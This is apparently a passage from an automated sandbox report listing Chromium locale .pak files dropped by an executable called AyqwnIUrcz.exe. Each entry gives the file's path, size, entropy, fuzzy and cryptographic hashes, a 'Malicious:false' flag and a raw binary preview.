                                                                                                                                                                      SHA1:8F3DAEC46E9A99C3B33E3D0E56C03402CCC52B9D
                                                                                                                                                                      SHA-256:61A3DAAE72558662851B49175C402E9FE6FD1B279E7B9028E49506D9444855C5
                                                                                                                                                                      SHA-512:409681829A861CD4E53069D54C80315E0C8B97E5DB4CD74985D06238BE434A0F0C387392E3F80916164898AF247D17E8747C6538F08C0EF1C5E92A7D1B14F539
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........c...h.(...i.0...j.<...k.K...l.V...n.^...o.c...p.p...r.v...s.....t.....v.....w.....y.....z.....|.....}................................................................... .....J.....].....q.................................................................<.....R.....r.....{.......................................................................+.....;.....J.....y.............................................................................6.....S.....w.............................................................................:.....S....._.................................................................0.....I.....`.....s.....z.....}.....~.....................................................M.....T.................................................................2.....N.....f.....................................................,.....:... .=...".I...%.u...(.....*.....+.....,.........../.....0.....1.....3.;...4.Z...5.m...6.....7.....8.....9.....;.....<.....=.....>.:...?.B...@.W...A...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\nb.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):383011
                                                                                                                                                                      Entropy (8bit):5.424530593988954
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:rmRAsByIhGvbSqOp7f21zg2mKP7s4Uzwn5el4nYHOp1D:rmRGxvbSqOp7f21vs4kM5el4Jp1D
                                                                                                                                                                      MD5:AF0FD9179417BA1D7FCCA3CC5BEE1532
                                                                                                                                                                      SHA1:F746077BBF6A73C6DE272D5855D4F1CA5C3AF086
                                                                                                                                                                      SHA-256:E900F6D0DD9D5A05B5297618F1FE1600C189313DA931A9CB390EE42383EB070F
                                                                                                                                                                      SHA-512:C94791D6B84200B302073B09357ABD2A1D7576B068BAE01DCCDA7BC154A6487145C83C9133848CCF4CB9E6DC6C5A9D4BE9D818E5A0C8F440A4E04AE8EABD4A29
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........S...h.....i.....j.+...k.:...l.E...n.M...o.R...p._...r.e...s.v...t.....v.....w.....y.....z.....|.....}.........................................................................3.....>.....M.....`.....h.....r.....................................................$.....<.....A.....P.....a.....h.....t...........................................................).....\.....o.....v.....{...........................................................).....A.....Z.....e.....i.....q.....x.....~...........................................................5.....X.....n.....w.........................................................................................!.....).....4.....;.....F.....v.......................>.....X.....p...........................................................&.....?.....W................................................... .....".....%. ...(.@...*.c...+.f...,.........../.....0.....1.....3.....4.....5.....6.L...7.c...8.....9.....;.....<.....=.....>.....?.....@.....A.....C.".

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\nl.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):395064
                                                                                                                                                                      Entropy (8bit):5.365550895872654
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:9V01rV7gSsX5SEHDpaQe3D+qnRVd5qYx1Gp7KhaPW:96NFgSsX5S1V7d5qYx1Gp7KcPW
                                                                                                                                                                      MD5:181D2A0ECE4B67281D9D2323E9B9824D
                                                                                                                                                                      SHA1:E8BDC53757E96C12F3CD256C7812532DD524A0EA
                                                                                                                                                                      SHA-256:6629E68C457806621ED23AA53B3675336C3E643F911F8485118A412EF9ED14CE
                                                                                                                                                                      SHA-512:10D8CC9411CA475C9B659A2CC88D365E811217D957C82D9C144D94843BC7C7A254EE2451A6F485E92385A660FA01577CFFA0D64B6E9E658A87BEF8FCCBBEAF7E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........E...h.....i.....j.....k.....l.#...n.+...o.0...p.=...r.C...s.T...t.]...v.r...w.....y.....z.....|.....}...............................................................................$.....4.....E.....N.....W.....r.....z.....................................................'.....7.....I.....V.....c...........................................................!.....`.....u.....z...........................................................+.....G.....f.......................................................................9.....E.....].....v.....................................................2.....F.....Y.....t.................................................................'.....a...................................<.....I.....Y.....a.....j.....n.....r...................................".....O.....d.....m.....x..................... .....".....%.....(.....*.....+.....,.!.....2.../.I...0.S...1.....3.....4.....5.....6.....7.....8.;...9.J...;.Z...<.h...=.v...>.....?.....@.....A.....C.....D...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\pl.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):439920
                                                                                                                                                                      Entropy (8bit):5.766175831058526
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:f2jujSo9/D+Xgv3iWGb1vPiCUdhUo3Ymhz1QhjAB5cUE447e:Sc3N1Qhw5me
                                                                                                                                                                      MD5:18D49D5376237BB8A25413B55751A833
                                                                                                                                                                      SHA1:0B47A7381DE61742AC2184850822C5FA2AFA559E
                                                                                                                                                                      SHA-256:1729AA5C8A7E24A0DB98FEBCC91DF8B7B5C16F9B6BB13A2B0795038F2A14B981
                                                                                                                                                                      SHA-512:45344A533CC35C8CE05CF29B11DA6C0F97D8854DAE46CF45EF7D090558EF95C3BD5FDC284D9A7809F0B2BF30985002BE2AA6A4749C0D9AE9BDFF4AD13DE4E570
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........T...h.....i.....j.%...k.4...l.?...n.G...o.L...p.Y...r._...s.p...t.y...v.....w.....y.....z.....|.....}.........................................................................6.....E.....S.....h.....q...........................................................3.....M.....S.....g.....|.................................................................).....;.....n.............................................................................2.....N.....i.....{.................................................................+.....6.....V.....c...........................................................(.....7.....M.....d.....{...........................................................T.............................,.....i.....r.....................................................7.....V.....r............................................. .....".)...%.K...(.c...*.....+.....,.........../.....0.....1.....3.,...4.K...5.i...6.....7.....8.....9.....;.....<.....=.....>.....?.$...@.7...A.{...C...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\pt-BR.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):415447
                                                                                                                                                                      Entropy (8bit):5.426006792591415
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:Bm1HqF4Znh9GzBtNBXBLd1OUDcpryHF55NJND0bsRzlb2:UHrnhMzX5PJB4sRxC
                                                                                                                                                                      MD5:0D9DEA9E24645C2A3F58E4511C564A36
                                                                                                                                                                      SHA1:DCD2620A1935C667737EEA46CA7BB2BDCB31F3A6
                                                                                                                                                                      SHA-256:CA7B880391FCD319E976FCC9B5780EA71DE655492C4A52448C51AB2170EEEF3B
                                                                                                                                                                      SHA-512:8FCF871F8BE7727E2368DF74C05CA927C5F0BC3484C4934F83C0ABC98ECAF774AD7ABA56E1BF17C92B1076C0B8EB9C076CC949CD5427EFCADE9DDF14F6B56BC5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........j...h.6...i.G...j.S...k.b...l.m...n.u...o.z...p.....r.....s.....t.....v.....w.....y.....z.....|.....}.....................................".....).....0.....1.....2.....7....._.....q.....................................................#.....%.....).....T.....c.....|...................................................../.....F.....P.....X.....h.....y...........................................................%.....:.....H.....Y.....r.................................................................+.....5.....F.....~...............................................).....;.....S.....V.....g.....y.............................................................................=.....y............................. .....H.....R.....i.....p.....z...............................................3.....f....................................... .....".....%.....(.....*.(...+.+...,.I.....Z.../.n...0.w...1.....3.....4.....5.....6.-...7.A...8.Y...9.l...;.|...<.....=.....>.....?.....@.....A.....C.!...D.+.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\pt-PT.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):416977
                                                                                                                                                                      Entropy (8bit):5.401132911995885
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:isWkrPyGJeOMqieJVJJxhlOlxLu3ov5xKqSR0B:X3PBxj8zv5xKqSRW
                                                                                                                                                                      MD5:6A7232F316358D8376A1667426782796
                                                                                                                                                                      SHA1:8B70FE0F3AB2D73428F19ECD376C5DEBA4A0BB6C
                                                                                                                                                                      SHA-256:6A526CD5268B80DF24104A7F40F55E4F1068185FEBBBB5876BA2CB7F78410F84
                                                                                                                                                                      SHA-512:40D24B3D01E20AE150083B00BB6E10BCA81737C48219BCE22FA88FAAAD85BDC8C56AC9B1EB01854173B0ED792E34BDFBAC26D3605B6A35C14CF2824C000D0DA1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........s...h.H...i.Y...j.e...k.t...l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.........................%.....-.....4.....;.....B.....C.....D.....I.....r...........................................................&.....(.....,.....W.....f...........................................................!.....9.....C.....K.....\.....n.................................................................%.....3.....D.....b.................................................................#.....+.....<.....t.....~...............................................(.....:.....T.....W.....h.....|.............................................................................N...................................0.....X.....b.....|.....................................................;.....^............................................. .....".....%.....(.3...*.P...+.S...,.q........./.....0.....1.....3.....4.....5.8...6.....7.....8.....9.....;.....<.....=.....>.....?.....@.+...A.a...C...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\ro.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):430191
                                                                                                                                                                      Entropy (8bit):5.460617985170646
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:pqgw32K4aoFt3GgnSYn0vLi5OU6ois2a/7ulqr:pqgVzFt3GgnSY0vLi5OXo3/5r
                                                                                                                                                                      MD5:99EAA3D101354088379771FD85159DE1
                                                                                                                                                                      SHA1:A32DB810115D6DCF83A887E71D5B061B5EEFE41F
                                                                                                                                                                      SHA-256:33F4C20F7910BC3E636BC3BEC78F4807685153242DD4BC77648049772CF47423
                                                                                                                                                                      SHA-512:C6F87DA1B5C156AA206DC21A9DA3132CBFB0E12E10DA7DC3B60363089DE9E0124BBAD00A233E61325348223FC5953D4F23E46FE47EC8E7CA07702AC73F3FD2E9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........L...h.....i.....j.....k.$...l./...n.7...o.<...p.I...r.O...s.`...t.i...v.~...w.....y.....z.....|.....}.........................................................................1.....@.....L.....Z.....e.....p...........................................................<.....E.....^.....n.....y...............................................+.....?.....T.................................................................M.....n...................................#.....+.....2.....8.....G.....Y.....n.....u...............................................T.....b.....t.....................................................,.....@.....G.....J.....K.....W.....c.....p.....y.................).....r.....z.............................9.....S.....d.....l.....r.....x.............................3.....V............................................. .....".....%.<...(.S...*.k...+.n...,.........../.....0.....1.....3.....4.'...5.G...6.....7.....8.....9.....;.....<.....=.....>.....?.....@.&...A._...C.....D...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\ru.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):703696
                                                                                                                                                                      Entropy (8bit):4.836890612319527
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:ckXRY5eXN2hHO3j/jHXzvMBsiA2kkce8P/XyFGGJGswfaZ/LeUFCcYWIkHWajf+F:ck5LZ5w6pF
                                                                                                                                                                      MD5:AB9902025DCF7D5408BF6377B046272B
                                                                                                                                                                      SHA1:C9496E5AF3E2A43377290A4883C0555E27B1F10F
                                                                                                                                                                      SHA-256:983B15DCC31D0E9A3DA78CD6021E5ADD2A3C2247322ADED9454A5D148D127AAE
                                                                                                                                                                      SHA-512:D255D5F5B6B09AF2CDEC7B9C171EEBB1DE1094CC5B4DDF43A3D4310F8F5F223AC48B8DA97A07764D1B44F1D4A14FE3A0C92A0CE6FE9A4AE9A6B4A342E038F842
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..........S.h.....i.....j.....k.....l.....n.#...o.(...p.5...r.;...s.L...t.U...v.j...w.w...y.}...z.....|.....}.........................................................................:.....W.....t.........................................E.....l.....n.....r...................................(.....A.....K.............................3.....?.....b.......................+.....5.....F.....[.....v.........................................8.....f.........................................*.....K.....e...................................H.....i.............................7.....t.....w...................................B.....I.....L.....M.....].....q...................................>.....J.................#.....e.........................................6.....t.................:.......................#.....7.....G.....w......... .....".....%.....(.....*.....+.....,.........../.....0.....1.]...3.t...4.....5.....6.N...7.r...8.....9.....;.....<.....=.....>.8...?.G...@.f...A.....C.!...D.2...E.j...F...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\sk.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):443094
                                                                                                                                                                      Entropy (8bit):5.818852266406701
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:vQt/WMWyqiLJcPXPk5ELALWaQlKDEmLFGR:vQYfyqiWPXM5ELALWaQlwdLE
                                                                                                                                                                      MD5:C6C7396DBFB989F034D50BD053503366
                                                                                                                                                                      SHA1:089F176B88235CCE5BCA7ABFCC78254E93296D61
                                                                                                                                                                      SHA-256:439F7D6C23217C965179898754EDCEF8FD1248BDD9B436703BF1FF710701117A
                                                                                                                                                                      SHA-512:1476963F47B45D2D26536706B7EEBA34CFAE124A3087F7727C4EFE0F19610F94393012CDA462060B1A654827E41F463D7226AFA977654DCD85B27B7F8D1528EB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........U...h.....i. ...j.,...k.;...l.F...n.N...o.S...p.`...r.f...s.w...t.....v.....w.....y.....z.....|.....}.........................................................................A.....U.....].....o.....z.....................................................9.....R.....q.....w...............................................!.....0.....6.....>.....N....._.....s.....................................................$.....:.....L.....h.......................................................................".....=.....|...............................................*.....9.....a.....d.....v...................................................................................d.......................t.........................................%.....0.....9.....P.....x.............................U.....r.....z........................... .....".....%.....(.....*.6...+.9...,.W.....h.../.....0.....1.....3.....4.....5.....6.D...7.Y...8.p...9.....;.....<.....=.....>.....?.....@.....A.(...C.I...D.T...E.t.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\sl.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):427791
                                                                                                                                                                      Entropy (8bit):5.48540289392965
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:iyCeC3SMQRB21BPDwY5oEcAVOlJgi/fzxzqg:iTJ6kDwY5oEc0i/fzxt
                                                                                                                                                                      MD5:D4BD9F20FD29519D6B017067E659442C
                                                                                                                                                                      SHA1:782283B65102DE4A0A61B901DEA4E52AB6998F22
                                                                                                                                                                      SHA-256:F33AFA6B8DF235B09B84377FC3C90403C159C87EDD8CD8004B7F6EDD65C85CE6
                                                                                                                                                                      SHA-512:ADF8D8EC17E8B05771F47B19E8027F88237AD61BCA42995F424C1F5BD6EFA92B23C69D363264714C1550B9CD0D03F66A7CFB792C3FBF9D5C173175B0A8C039DC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........A...h.....i.....j.....k.....l.....n.!...o.&...p.3...r.9...s.J...t.S...v.h...w.u...y.{...z.....|.....}.....................................................................................*.....:.....B.....R.....y...............................................,.....D.....N.....X.....b.....m.....{.................................................................M.....c.....h.....o...........................................................%.....C.....d.................................................................3.....=.....L.....c.....v.....................................................-.....@.....P.....e.....|.................................................................Y.............................2.....m.....z.....................................................2.....H.....o............................................. .....".....%.....(.P...*.t...+.w...,.........../.....0.....1.....3. ...4.<...5.Q...6.....7.....8.....9.....;.....<.....=.....>.....?.....@.,...A.....C...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\sr.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):660194
                                                                                                                                                                      Entropy (8bit):4.761695251077794
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:oLNvoUKEuNI0I4Ki1eg82ATs+Hc549x4moW037LJzk/k/N:xrnqJc5Axjw
                                                                                                                                                                      MD5:CBB817A58999D754F99582B72E1AE491
                                                                                                                                                                      SHA1:6EC3FD06DEE0B1FE5002CB0A4FE8EC533A51F9FD
                                                                                                                                                                      SHA-256:4BD7E466CB5F5B0A451E1192AA1ABAAF9526855A86D655F94C9CE2183EC80C25
                                                                                                                                                                      SHA-512:EFEF29CEDB7B08D37F9DF1705D36613F423E994A041B137D5C94D2555319FFB068BB311884C9D4269B0066746DACD508A7D01DF40A8561590461D5F02CB52F8B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........e...h.,...i.=...j.I...k.X...l.c...n.k...o.p...p.}...r.....s.....t.....v.....w.....y.....z.....|.....}.................................................&.....'.....(.....*.....y............................. .....b.........................................?.....c.........................................?.....V.....o...................................3.....R...................................'.....1.....A.....M.....l.............................J.....................................................4.....@.....c.............................-.....l...................................P.....S.....n.....................................................%.....1.....J.....Y.....o.......................).................&.....n...............................................g.......................H...................................0.....E... .Y...".....%.....(.....*.....+."...,.@.....h.../.....0.....1.....3.....4.R...5.....6.....7.....8.B...9.v...;.....<.....=.....>.....?.....@.....A.....C...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\sv.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):385361
                                                                                                                                                                      Entropy (8bit):5.543491670458518
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:M4pITVzssdlJ9EAjiws8cB7xjpZ/4LLXru9M9SOxDE/xUDvZv5pB5mEgb7:BpIXzJ9V2B1q5/5mz
                                                                                                                                                                      MD5:502E4A8B3301253ABE27C4FD790FBE90
                                                                                                                                                                      SHA1:17ABCD7A84DA5F01D12697E0DFFC753FFB49991A
                                                                                                                                                                      SHA-256:7D72E3ADB35E13EC90F2F4271AD2A9B817A2734DA423D972517F3CFF299165FD
                                                                                                                                                                      SHA-512:BD270ABAF9344C96B0F63FC8CEC04F0D0AC9FC343AB5A80F5B47E4B13B8B1C0C4B68F19550573A1D965BB18A27EDF29F5DD592944D754B80EA9684DBCEDEA822
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........0...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.*...t.3...v.H...w.U...y.[...z.j...|.p...}...........................................................................................!.....).....2.....M.....U.....`...........................................................&.....-.....:.....c.....t.........................................................../.....;.....C.....U.....e.....i.....s.....z...................................%.....H.....S.....Y.....a.....h.....n.....{.....................................................).....R.....q.....y.................................................................$.....+.........../.....7.....?.....J.....R.....].................".....).....u.................................................................'.....?.....k...............................................".....*... ./...".9...%.[...(.x...*.....+.....,.........../.....0.....1.....3.)...4.P...5.e...6.....7.....8.....9.....;.....<.....=.....>.....?.....@.%...A.Q...C.p.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\sw.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):404460
                                                                                                                                                                      Entropy (8bit):5.342349721117576
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:icM47G565vqimUwbQuBndO8gJGgnATm5A1vZcsToe4t2ht:iy7GsP5Ar
                                                                                                                                                                      MD5:39277AE2D91FDC1BD38BEA892B388485
                                                                                                                                                                      SHA1:FF787FB0156C40478D778B2A6856AD7B469BD7CB
                                                                                                                                                                      SHA-256:6D6D095A1B39C38C273BE35CD09EB1914BD3A53F05180A3B3EB41A81AE31D5D3
                                                                                                                                                                      SHA-512:BE2D8FBEDAA957F0C0823E7BEB80DE570EDD0B8E7599CF8F2991DC671BDCBBBE618C15B36705D83BE7B6E9A0D32EC00F519FC8543B548422CA8DCF07C0548AB4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........Y...h.....i.....j.+...k.:...l.E...n.M...o.R...p._...r.e...s.v...t.....v.....w.....y.....z.....|.....}.........................................................................3.....E.....U.....i.....u...........................................................+.....H.....N.....Z.....m.....z.....................................................$.....8.....E.....p.......................................................................8.....W.....{................................................................. .....[.....m.....{...................................(.....4.....K.....x.....{.........................................................................................+.....\...................................+.....P.....Z.....r.....x...............................................-.....L............................................. .....".....%.....(.7...*.S...+.V...,.t........./.....0.....1.....3.....4.....5.1...6.i...7.....8.....9.....;.....<.....=.....>.....?.....@.....A.9.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\ta.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1043803
                                                                                                                                                                      Entropy (8bit):4.044068430611977
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:LXNxfy+orMVjLn1ExBlhfg5yzntRMcA2i:rffyrrMFL1cB3g5yzMcA2i
                                                                                                                                                                      MD5:7006691481966109CCE413F48A349FF2
                                                                                                                                                                      SHA1:6BD243D753CF66074359ABE28CFAE75BCEDD2D23
                                                                                                                                                                      SHA-256:24EA4028DA66A293A43D27102012235198F42A1E271FE568C7FD78490A3EE647
                                                                                                                                                                      SHA-512:E12C0D1792A28BF4885E77185C2A0C5386438F142275B8F77317EB8A5CEE994B3241BB264D9502D60BFBCE9CF8B3B9F605C798D67819259F501719D054083BEA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........(...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.#...v.8...w.E...y.K...z.Z...|.`...}.r.....z.................................................................M.....{.............................v.......................n.....p.....t.................E.....c.......................;.......................0.....m...............................................$.....`...................................0.....y.................9.............................!.....(.....F.....n.......................3.............................F...........;.....`.......................7.....:.....n.................$.....Z.....................................................E.....#.......................Q.................c.............................#...../.....s.............................B.................*.....?.....d............... .....".....%.}...(.....*.O...+.R...,.p........./.....0.....1.u...3.....4.....5.....6.....7.]...8.....9.....;.'...<.G...=.j...>.....?.....@.....A.9...C...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\te.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):965006
                                                                                                                                                                      Entropy (8bit):4.295544641165274
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:wM9fKUyABW3p1F9SviTlw2cfgvNFOJgr/p54JVQJMwKpaJC28+58XoX0Doq9OyUk:wM9fKU6225jM9h
                                                                                                                                                                      MD5:F809BF5184935C74C8E7086D34EA306C
                                                                                                                                                                      SHA1:709AB3DECFF033CF2FA433ECC5892A7AC2E3752E
                                                                                                                                                                      SHA-256:9BBFA7A9F2116281BF0AF1E8FFB279D1AA97AC3ED9EBC80C3ADE19E922D7E2D4
                                                                                                                                                                      SHA-512:DE4B14DD6018FDBDF5033ABDA4DA2CB9F5FCF26493788E35D88C07A538B84FDD663EE20255DFD9C1AAC201F0CCE846050D2925C55BF42D4029CB78B057930ACD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........o...h.@...i.Z...j.f...k.u...l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.........................&...........5.....<.....C.....D.....E.....J.................5.....r.............................#.............................8.....~.......................T.....v.......................x...........#.....A.....c.......................s.......................=...................................V.................v...........>.....s.........................................h.....}.................L.....g.................n.......................:.....c.............................".....R.........................................%.....L.....s.................k...................................1.............................A.....V.....e...........".....r...........P...........>.............................U.....|... .....".....%.....(.q...*.....+.....,.........../.n...0.....1.#...3.F...4.....5.....6.O...7.....8.....9.$...;.Q...<.n...=.....>.....?.....@.....A.Z.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\th.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):811437
                                                                                                                                                                      Entropy (8bit):4.342029978594925
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:1Jf31Mkgs3s5UWgHLRflsjj8cKGXdlogG0EeuLADh7Kle9dKj753ohP09XAyFHyJ:1Qzt5/5l
                                                                                                                                                                      MD5:2C41616DFE7FCDB4913CFAFE5D097F95
                                                                                                                                                                      SHA1:CF7D9E8AD3AA47D683E47F116528C0E4A9A159B0
                                                                                                                                                                      SHA-256:F11041C48831C93AA11BBF885D330739A33A42DB211DACCF80192668E2186ED3
                                                                                                                                                                      SHA-512:97329717E11BC63456C56022A7B7F5DA730DA133E3FC7B2CC660D63A955B1A639C556B857C039A004F92E5F35BE61BF33C035155BE0A361E3CD6D87B549DF811
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..........y.h.....i.....j.....k.....l.....o.....p.....r.....s.....t.....v.....w.....y.....z.,...|.2...}.D.....L.....Q.....Y.....d.....l.....q.....y.............................................................................(.....7................................... .....Y.....k.............................=.....\.....z.............................^.................d.....................................................J.....w.......................F.....y...............................................,.....J.....t.................".....y.................E.....c...................................&.....G.....d.....................................................;...........P.................n.................j.........................................9.......................C.....{...........5.....>.....S..................... .....".....%.?...(.....*.....+.....,.........../.U...0.h...1.....3.....4.V...5.....6.)...7.J...8.....9.....;.....<.....=.....>.X...?.....@.....A.....C. ...D.<...E.o.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\tr.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):411446
                                                                                                                                                                      Entropy (8bit):5.6133974766805546
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:y1MAG26Pl1kY1bkQq/7I5NsA7WGgeh5X/0+gi1ZavXEAQwiBvVGI:9j2Yle66s5775X/R
                                                                                                                                                                      MD5:3A858619502C68D5F7DE599060F96DB9
                                                                                                                                                                      SHA1:80A66D9B5F1E04CDA19493FFC4A2F070200E0B62
                                                                                                                                                                      SHA-256:D81F28F69DA0036F9D77242B2A58B4A76F0D5C54B3E26EE96872AC54D7ABB841
                                                                                                                                                                      SHA-512:39A7EC0DFE62BCB3F69CE40100E952517B5123F70C70B77B4C9BE3D98296772F10D3083276BC43E1DB66ED4D9BFA385A458E829CA2A7D570825D7A69E8FBB5F4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........}...h.\...i.m...j.w...k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.......".....'...../.....7.....?.....F.....M.....T.....U.....V.....X...........................................................L.....f.....h.....l.....................................................:.....O.....[.....~............................................... .....$.....,.....9.....N.....P.....S.....Z.....q.....................................................!.....(...../.....D.....X.....{.........................................3.....V.....e.....q.....|.............................................................................).....2.....9.....D.....L.....[.................!.....'.....o.................................................................9.....X.........................................!.....0.....G.....M... .X...".m...%.....(.....*.....+.....,.........../.....0.%...1.Z...3.g...4.}...5.....6.....7.....8.....9.2...;.B...<.M...=.Z...>.m...?.v...@.....A.....C...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\uk.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):705061
                                                                                                                                                                      Entropy (8bit):4.868598768447113
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:wrccq9nty/KiDswU1nbx05kB3IjUUmEg5KuoLNiXElqnOyh:HGX35EEK
                                                                                                                                                                      MD5:EE70E9F3557B9C8C67BFB8DFCB51384D
                                                                                                                                                                      SHA1:FC4DFC35CDE1A00F97EEFE5E0A2B9B9C0149751E
